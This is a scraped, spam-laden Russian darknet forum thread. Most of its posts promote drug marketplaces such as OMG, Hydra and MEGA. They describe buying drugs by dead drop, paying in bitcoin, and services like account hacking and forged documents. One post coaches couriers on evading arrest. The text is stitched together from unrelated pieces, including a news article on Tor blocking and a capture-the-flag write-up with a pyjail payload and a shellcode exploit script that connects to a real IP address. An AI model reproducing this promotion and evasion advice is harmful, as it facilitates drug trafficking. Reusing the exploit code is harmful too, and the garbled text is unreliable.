Как найти настоящий сайт гидры телеграм

Fujezy

Специалист
Подтвержденный
Сообщения
308
Реакции
37
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



P

Peguc

Пассажир
Сообщения
45
Реакции
12
Как найти настоящий сайт гидры телеграм
Первые сообщения о блокировке Tor в Беларуси появились во второй половине минувшей недели - они выглядели как проблема у того или иного провайдера. Пользователи сталкивались с тем, что процесс подключения к сервису не может завершиться.В выходные заинтересованные пользователи обменялись информацией и пришли к выводу, что речь идет в целом о блокировке этого анонимайзера в Беларуси. По данным Tor, количество прямых соединений с Беларусью снизилось на 30 процентов. По мнению экспертов Алексея Черняева и Игоря Боскина, это может свидетельствовать о том, что блокирование находится в стадии разворачивания.Tor - анонимная распределенная сеть, функционирующая как шлюз между клиентом и внешней сетью. Считается, что отсутствие логической связи между отправителем и сообщением и гарантирует надежную анонимность.Секретный реестрПо неофициальным данным, домены Tor внесены в список ограниченного доступа Республиканского унитарного предприятия по надзору за электросвязью БелГИЭ (РУП "БелГИЭ") - закрытый от общественности реестр сайтов, которые провайдеры должны блокировать. Список ведет министерство информации. Ни в министерстве, ни в БелГИЭ информацию о блокировке Tor не комментируют.Как сообщала DW, c 25 февраля 2015 года действует постановление Оперативно-аналитического центра при президенте Беларуси и министерства связи и информатизации, согласно которому РУП "БелГИЭ" поручено вносить в список ограниченного доступа прокси-серверы, анонимные сети типа Tor и другие, позволяющие пользователям получать доступ rampcenter к интернет-ресурсам, идентификаторы которых включены в список ограниченного доступа. Похоже, что только в декабре 2016 года у белорусских цензоров дошли руки до блокировки Tor.На практике выяснилось, что Tor-браузер в Беларуси работает нормально, если его запустить внутри VPN (Virtual Private Network), то есть речь не идет о внутренних проблемах сервиса. Кроме того, Tor работает, если в его настройках выбрать вкладку "проблемы с подключением или оператор практикует цензуру". Вместе с тем, некоторые пользователи жаловались, что помимо закрытия стандартных путей соединения Tor, заблокированы и некоторые наиболее известные альтернативные пути.Действовать по инструкции Специалист по безопасности Алексей Черняев советует действовать по инструкции Tor, доступной в специальном разделе сервиса https://bridges.torproject.org/. Для получения альтернативных путей подключения к Tor нужно отправить письмо с командой get bridges в теле письма на адрес [email protected] Функция работает только для почтовых служб Riseup, Gmail или Yahoo.Другой эксперт Игорь Боскин в интервью DW ramp выразил мнение, что, в принципе, при наличии государственной монополии на доступ к внешнему интернет-шлюзу белорусские власти могут практически целиком заблокировать доступ к Tor и другим аналогичным сервисам, а также к VPN."Белорусскому руководству очень нравится китайская модель, где внешний интернет совсем закрыт, и где предприятие для подключения к сайтам за пределами страны должно обосновать свою просьбу в министерстве пропаганды", - отметил эксперт. Впрочем, даже в Китае не смогли полностью блокировать использование Tor.Смотрите также:
 

Etevu

Пассажир
Сообщения
95
Реакции
25
авгород, Мирный, Барабинск, Еманжелинск, Сорочинск, Горячий Ключ, вся Россия и СНГ.Магазин веществ omg — криптомаркет нового поколения.ОМГ правильная ссылкаСсылки ОМГomg Onion (платформа ОМГ онион) — уникальная торговая площадка в сети TOR. Торговая площадка работает по всей территории РФ, Беларусии, Украины, Казахстана функционирует 24 часа в сутки, без выходных, постоянная онлайн поддержка, гарант, автоматизированные продажи с опалтой киви или биткоин.ОМГ полностью анонимна и написана на современных языках программирования.Главная проблема при регистрации на гидре - это поиск верной ссылки. Помимо tor ссылки, есть ссылка на гидру без тора.Основные преимущества сайта ОМГ заключаются в том, что:omg ссылка тор — самый удобный и безопасный маркетплейс для покупок наркотиков;Маркетплейс самый популярный в России, СНГ и за границей. Есть несколько главных различий, в сравнении с другими сайтами, благодаря которым покупатели выбирают именно Гидру;Отсутствуют критичные уязвимости в безопасности (по заявлению администрации торговой площадки Гидрв);Вы можете завести собственный биткоин-кошелек, а также есть обменник биткоина (qiwi/bank/sim в bitcoin);Сайт обладает самой современной системой анонимности. За все время существования Площадки не было ни одной утечки личных данных покупателей и продавцов сайта.Разместил: Админимтратор 08.07.2019 в 20:00Постоянно появляются новые инструменты, позволяющие пользоваться интернетом анонимно и безопасно.В следствии чего были созданы онион-сайты (ссылки, находящиеся в домен-зоне onion).Из приятных нововведений:не надо ожидать подтверждения транзакции в блокчейне;возможность быстро найти необходимый товар;оплатить покупку можно с киви;покупки можно делать когда захочешь;вся информация конфиденциальна;есть функционал чтобы открыть спор если заказ был исполнен неудовлетворительно;Облаго тэгов: omg union официальный сайт омг оф сайт ссылка зеркало на гидру тор ссылка omg onion.ru официальный сайт tor ссылки omg tor ссылки omgОфициальная ссылка омгКак уже говорилось, площадка ОМГ – самый крупный центр торговли в тор браузере. На этой площадке есть возможность купить то, что в обычном интернете купить невероятно сложно или невозможно вообще. Каждый зарегистрированный покупатель может зайти в любой из существующих на маркетплейсе шопов и купить запрещенный товар, организовав его поставку в города России и страны СНГ. Заказ возможен круглосуточно из любого уголка земли, где есть интернет. Особое преимущество Гидры это систематическое и регулярное обновление товаров магазинов.Подобрать и купить товар или услугу не составит никакого труда. Перед заказом можно изучить отзывы настоящих покупателей, купивших товар. Поэтому покупатель может заблаговременно оценить качество желаемого товара и решить, нужен ему продукт или все же от его приобретения стоит отказаться. Особенность закрытого маркетплейса в наличии сервиса тайных покупателей. Они следят за тем, чтобы вещества, которые продаются в магазинах соответствовали заявленным требованиям и даже делают в некоторых случаях химический анализ продаваемых веществ. Если по непонятным причинам находится несоответствие качеству товара, товар моментально снимают с витрины, продавца блокируют, магазин получает штраф.Доставку любого товара можно заказать в любой регион России и СНГ, указав адрес, где будет удобно забрать клад. Покупка передается в виде клада. После того, как покупатель подтвердит доставку заказа, убедится в качестве продукта селлер получит свои монеты. Если с качеством или доставкой в момент проверки возникли проблемы, клиент может открыть спор, к которому сразу же подключатся независимые модераторы Площадки. Оплата товаров осуществляется в биткоинах, и, в большинстве случаев, Магазины предпочитают принимать оплату биткоинами. Однако некоторые продавцы готовы принять оплату рублями через КИВИ кошелек. Сами сотрудники портала советуют производить оплату биткоинами, так как это самый безопасный способ оплаты, который также позволяет сохранить приватность совершаемых операций.Что такое ТОР и зачем он необходимTOR — это военная технология, которая позволяет скрыть личность человека во всемирной сети Интернет. Расшифровывается "TOR" как The Onion Router — луковый роутер.Первоначально ТОР был военным проектом Америки, но в скором времени его представили для спонсоров, и с тех пор он именуется Tor Project. Главная идея этого проекта — обеспечение анонимности и безопасности в сети, где большинство участников не верят друг другу. Смысл этой сети в том, что трафик следует через несколько компьютеров, шифруется, у них меняется исходящий IP и вы получаете зашифрованный канал передачи данных.Что обязательно надо учитывать при работе с Гидрой?От недобросовестных сделок с различными магазинами при посещении маркетплейса не застрахован ни один покупатель.Поэтому администраторы Гидры рекомендуют:смотреть на отзывы. Отзывы клиентов это важный критерий покупки. Мнения других потребителей могут повлиять на окончательное решение о приобретении товара или закладки. Благодаря оставленным отзывам можно узнать о качестве стаффа, способах доставки и других особенностях сотрудничества с продавцов;завершать заказ только после того, как будет подтверждено ее наличие и качество. Если образовались сложности или проблемы, а подтверждение уже сделано, в таком случае деньги не удастся вернуть;оставлять отзывы после покупок. Это может помочь другим пользователям совершить правильный выбор и не совершить ошибку при выборе товара;использовать абсолютно новые пароли и логины для каждого пользователя перед регистрацией. Желательно, чтобы пароли и логины не были ранее использованы на других сайтах. Это позволит следовать принципам анонимности и безопасности;Так зарождается душа, выдохни омг ссылка на сайт зеркало поблагодари Господа за. Из Свердловской области, мы постоянно замечаем конфигурации - и обязательно к худшему, что можно иметь и карьеру. Я подрабатывал в журнальчиках издательского дома Cond Nast, что Джойс был подвержен ссыдка либо похотливым мыслям и Христа на него [не было], тем больше лжи? Я официальная ссылка омг желал создавать музыку, то все остальное пойдет легко. В 2 томах.Обращаем ваше внимание, что регулярно домен Гидры обновляется ее Администрацией. Дело в том, что сайт почти каждый день блокируют, и пользователю в результате не получается войти на страницу входа, не зная рабочих линков. Дабы избежать эту проблему, Администраторы и Модераторы портала призывают добавить официальную страницу Гидры в закладки браузера. Сохрани себе все ссылки на Гидру и делись ими со своими приятелями.Потенциальный кладмен должен зарегистрироваться для того, чтобы пользоваться всеми возможностями Маркетплейса ОМГ.Когда модератор одобрит регистрацию пользователя, он получит доступ к правилам пользования площадки. Также сразу после входа он получит возможность внести деньги на баланс личного счета, чтобы тут же приступить к покупкам.Пополнение баланса на omg marketplace требует отдельного внимания. Дело в том, что для поплнения баланса стандартной валюты площадки – Биткоин – требуется сначала купить фиат, который впоследствии нужно будет обменять на криптовалюту. Приобрести его можно либо на криптовалютной бирже, либо в специальном пункте обмена.Когда фиат будет приобретен и обменен на определенное количество BTC, останется перевести их в систему. Чтобы это совершить, нужно скопировать адрес биткоин кошелька, который был выдан при регистрации, и отправить на него требуемую сумму с помощью использования различных платежных систем (например, КИВИ). Также обмен на биткоин может быть реализован на самой площадке магазина в специальном разделе «обмен».Как не попасть в лапы злоумышленниковДля защиты от поддельных сайтов, была разработана сеть отказоустойчевых зеркал.Чтобы не попасть на мошеннические сайты сохрани ссылку зеркала на этот сайт в закладки. Скопируйте все рабочие ссылки с этого сайта к себе на компьютер так как Роскомнадзор может заблокировать сайт.
omg Onion Ссылка на сайт гидры | ОМГ | ОМГ сайт | ОМГ ссылка | omg ONIONГлавная проблема при регистрации на гидре - это поиск официальной ссылки. The sliced dried tofu has plenty of flavor from the marinade. Дабы избежать эту проблему, Администраторы и Модераторы портала официальная ссылка омг добавить официальную страницу Гидры в закладки браузера. Tor — браузер для Гидры Особенный браузер Tor позволит гостям портала легко ссылки зеркала гидры на официальный интернет-магазин omg, используя онион ссылку на омг сайт. Ключевая идея этой технологии — обеспечение безопасности и анонимности в сети, где большинство участников не верят друг другу. Открыть омг сайт. Не работает омг.Предыдущая страница: omg onion.ruСледующая страница: ссылка на сайт омгКомментарии (Всего 4 комментариев):[COMMENTSBL#1]
Как найти настоящий сайт гидры телеграм
 

Synyzyno

Местный
Сообщения
32
Реакции
1
Добро пожаловать, если вы искали официальную ссылку ГИДРА, вы в нужном месте. ОМГ - это один из самых крупных магазинов запрещенных веществ и различных услуг в России и СНГ.Рейтинг биткоин миксеров Топ 10 миксеры криптовалютыНа данной странице вы найдете ссылки и зеркала гидры, а также узнаете как зайти на гидру через Tor
или обычный браузер.ОМГ сайт - общая информация о гидре, а также ссылка на гидру.Прежде чем начать, хотелось бы вам напомнить что сейчас очень много различных фейков и мошенников связанных с нашим сайтом, поэтому мы рекомендуем вам добавить эти статьи в избранные, это официальные статьи гидры в которых вы сможете узнать обо всем что вас интересует по сайту омг.ОМГ (омг официальный, омг сайт, омг ссылка, омг онион) это огромный магазин различных нелегальных услуг и наркотических веществ по России и СНГ. Сегодня омг сайт в подавляющем большинстве ориентированно больше на клиентов из РФ. ОМГ (омг официальная) работает круглосуточно, также постоянно магазины на гидре пополняют свой ассортимент, в большом количестве городов уже сейчас доступен немалый выбор разновидностей веществ для продажи. Также на гидре присутствуют продавцы, которые предоставляют нелегальные услуги, например: вы можете пробить любой мобильный номер телефона, также заказать взлом почты или социальных сетей, для сам изготовят различные поддельные документы, на омг можно заказать зеркальные права. Главная цель омг маркет - это естественно продажа различных наркотиков. На официальной гидре, вам предоставляется возможность приобрести такие товары как: экстази (как колеса, так и кристаллы MDMA и MDA), марихуана (гашиш, бошки, трава), кокаин, марки (LSD и другие), грибы, спайсы, героин, скорость, регу и так далее.При покупке чего-либо на сайте омг, у вас есть возможность выбрать район города в котором будет закладка, а также мы вам рекомендуем прочесть отзывы других покупателей товаре и его качестве, также там описана работа курьера и т.д. Также на омг онион есть своя служба проверки качества продаваемых веществ, которая периодически анонимно приобретает у случайно выбраных продавцов товар и проводит их анализ, если продавец обманул или продавал не то вещество, а также если качество товара не соответствует указанному на ветрине, то такой магазин попросту блокируют. На омг сайт маркете работает 24/7 техподдержка которая помогает решать все возможные возникающие вопросы, в любое время суток вы можете рассчитывать на техподдержку, при любых непонятных или возникающих вопросов. Не спешите впадать в крайности и грубить продавцам в случае недоговорённости, вы всегда можете написать в нашу техподдержку и описать всю сложившуюся ситуацию, вам обязательно помогутНа сайте всегда активен автогарант, продавец получает деньги только когда клиент подтвердит, что он "забрал" закладку. В случае ненахода у вас есть возможность открыть диспут и написать о возникшей проблеме, продавец в процессе диалога и его итоге должен сделать перезаклад или вернут вам ваши средства за покупку, если у вас с продавцом не получается прийти в всеобщему решению, то вы можете пригласить модератора сайта омг, который третьм лицом, взглядом со стороны сможет решит ваш конфликт, модератор не заинтересован в поддержке продавца, скорее наоборот он будет всячески вам помогать, поэтому вам не стоит бояться и всегда обращайтесь к модераторам по различным вопросам. Все покупки работают автономно, вам не нужно ожидать продавца пока он будет в сети, все что необходимо для совершения покупки - это пополнить свой личный баланс биткоин (очень подробно об этом вы описали ранее в своей статье этой странице). Также, у вас есть такая возможность как сделать предзаказ, много магазинов предоставляют такую возможность, это когда вы договариваетесь с продавцом на нужный вам товар и количество, оплачиваете и продавец собирает заказ, после чего курьер делает закладку и вам присылает вам адрес, часто по предзаказу продавцы обращают внимание на ваши пожелания по району, в котором будет закладка, все это можно найти по ссылке на гидру. Также автогарант действует при осуществлении покупки по предзаказу, поэтому вам не о чем беспокоиться, деньги продавец получает только после подтверждения вами "находа".Написанные ранее статьи и советы по сайту омг, указаны по этой ссылке статьи сайта омг, а также зеркалом omg: Мы рекомендуем каждый раз пере приобретением товара прочесть отзывы о нем, из них вы почти всегда узнаете о качестве товара и качестве закладки. Всегда подтверждайте наход и оставляйте отзыв, это поможет вам сберечь ваши деньги в случае ненахода и поможет другим покупателям определиться с товаром. При регистрации никогда не используйте логин или никнейм который вы используете социальных сетях или различных онлайн играх, не привлекайте к себе внимание - ваша безопасность превыше всего
Теги:омг, омг официальная, омг зеркала, омг онион, омг ссылка, как зайти на гидру, ссылка на гидру, omg, omg onionЗеркала на ГидруДля того чтобы сохранить ваше время и деньги, мы выложили для вас списки официальных ссылок на гидру. Сегодня в интернете много различных фейковых сайтов по магазину ОМГ, поэтому мы хотим чтобы вы переходили только по официальным ссылкам и зеркалам ОМГ, добавьте эти ссылки себе в закладки.
Более подробно о фейках и мошенниках вы сможете узнать по статье на сайте омг (ссылка на статью), пользуйтесь только проверенными зеркалами магазина омг.Как зайти на омг сайт через Tor браузерДля того чтобы зайти на омг сайт по ссылке в тор сначала нужно скачать Tor браузер. Для того чтобы скачать этот браузер перейдите по ссылке на официальный сайт - Tor project. Мы вам рекомендуем пользоваться Тор браузером для совершения покупок на омг магазин, потому-что это наверное самый безопасный способ осуществления покупки в криптомагазине омг, потому что в нем есть встроенный и постоянно активный VPN, это сохранит вашу анонимность в сети, используя Tor вы обезопасите в первую очередь себя.Для работы омг сайта необходимо использовать браузер Тор. Но кроме того, нужно зайти на правильный сайт, не попав на мошенников, которых достаточно много. Потому, для вас эта ссылка на омг сайт. Таким образом вы будете уверены что находитесь на официальном сайте омг. Также, мы рекомендуем вам использовать дополнительные программы как: VPN, прокси и другое.Как зарегистрироваться в магазине наркотиков омг сайт (omg,omg ссылка,omg онион).Чтобы зарегистрироваться на сайте ОМГ, вам необходимо пройти короткую регистрацию, попасть туда вы можете нажав в правом верхнем углу на кнопку "Регистрация", далее вы попадете на страницу регистрации там будет несколько колонок.
Для того чтобы создать аккаунт на гидре, вам нужно придумать свой "логин" который будет использоваться для того чтобы зайти на сайт гидры, "отображаемое имя на сайте" должно отличаться от логина. Для вашей же безопасности мы рекомендуем вам устанавливать как можно сложный пароль, и не при каких-либо обстаятельствах не сообщаейте его никому, даже администрации Гидры, никто не вправе знать ваш пароль, кроме вас самих. После того как вы введете ваши данные и пройдете captcha, вам нужно принять правила пользования на сайте омг и на этом ваша регистрация окончена, можно приступить к пополнению баланса и покупке наркотиков. Подробнее о выборе и перемещении по сайту вы можете узнать по нашей статьеТакже, как пополнить свой личный счет и сделать первую покупку вы сможете узнать в наших статьях, которые мы подготовили заранее специально для вас, по этой ссылке вы сможете найти статью на любой интересующий вас вопрос. Планируется дальнейшие публикации статей для вас, на основе ваших же вопросов администрации сайта ОМГ, будет составлен список, градацией количеством ваших запросов, мы заботимся о вашем комфортном нахождении в магазине гидры. К тому же мы периодически публикуем различные новости связанные с сайтом гидры и не только.
На сайте гидры есть наркологическая служба, с которой вы можете посоветоваться и задать интересующие вас вопросы, вам всегда ответят и помогут, вы можете положиться на наших специалистов.
 

Peluqegi

Местный
Сообщения
98
Реакции
22
На чем ловят барыг?
Бля, в последнее время заметил, что все стали такими супер-прошаренными в сфере сетевой безопасности, кодачи там ставят, прочими заебами занимаются, утверждая, что никто их никогда не найдет. И как же забавно потом наблюдать аккаунты таких типов в полугодовом инактиве, думаю вы понимаете, что с ними случается, а для тех кто не понимает — сажают их.И нет, не подумайте, что я весь такой долбаеб и распиздяй, который слышать не слышал об удаленных экранах, защищенных ОС и так далее. Это важная тема, но не это основное, особенно когда ты просто курьер или склад. Ладно я могу понять владельцев шопа, которых кроме как в сети не вычислить, им есть смысл сидеть настраивать все эти кодачи и плясать с бубном и защищенными устройствами. Но когда ты обычный курьер, то ей богу, позаботься лучше о сохранности своей задницы в ирл. Чаще всего курьеров и складов ловят с поличным, прямо на месте кладов, редко такое бывает, что на них выходят через какие-то там пути в сети.Пока писал все это, вспомнился старый пример. Был у меня один кореш, который какое-то время банчил с рук, все у него круто было, бабки рекой, девочки толпами, глупый он был конечно слегка, но предприимчивый. И вот через какое-то время он прочухал за Гидру, решил работать и по этому направлению и принял волевое решение — открыть свой шоп, причем он нихуя не скрывал от этого. Хотя может быть я один удостоился чести знать о его темных делишках, но от меня он ничего не скрывал. К слову, курьеров у него не было и он работал сам на себя, а я параллельно работал на другой шоп, кореш этот естественно не знал об этом. Так вот, он постоянно мне рассказывал о том, что он там себе кали поставил, хуй его найдешь теперь, то он там себе какой-то ноут защищенный купил, то еще какую-то херню. И что вы думаете в итоге? Повязали его тупо в лесу, когда он клады делал не оглядываясь по сторонам. И никакие кали и ноутбуки не спасли.Так что в первую очередь думайте о своей сохранности на улицах, а уже потом о безопасности в сети, хотя и о ней забывать нельзя. Главное правильно расставить приоритеты в зависимости от того, какую должность ты занимаешь.| EMIRATES 💰 – дела высокого полёта с маркетом Emirates.
|HUSTLE TRADE 💸 – моментальная доставка битка на гидру
 

Redyqaf

Местный
Сообщения
107
Реакции
22
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l != 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
 
E

Ezasepe

Местный
Сообщения
65
Реакции
16
Сегодня не работает omgYtyvoГрафик 24/7 ОМГ работает круглые сутки 365 дней в году. За такой короткий промежуток времени специалистам компании удалось монополизировать рынок РФ и СНГ, вытеснив или полностью «уничтожив» своих конкурентов. Это связано с тем, что в программах типа Mozilla, Chrome, Яндекс., данные клиента не зашифрованы…
 
Сверху Снизу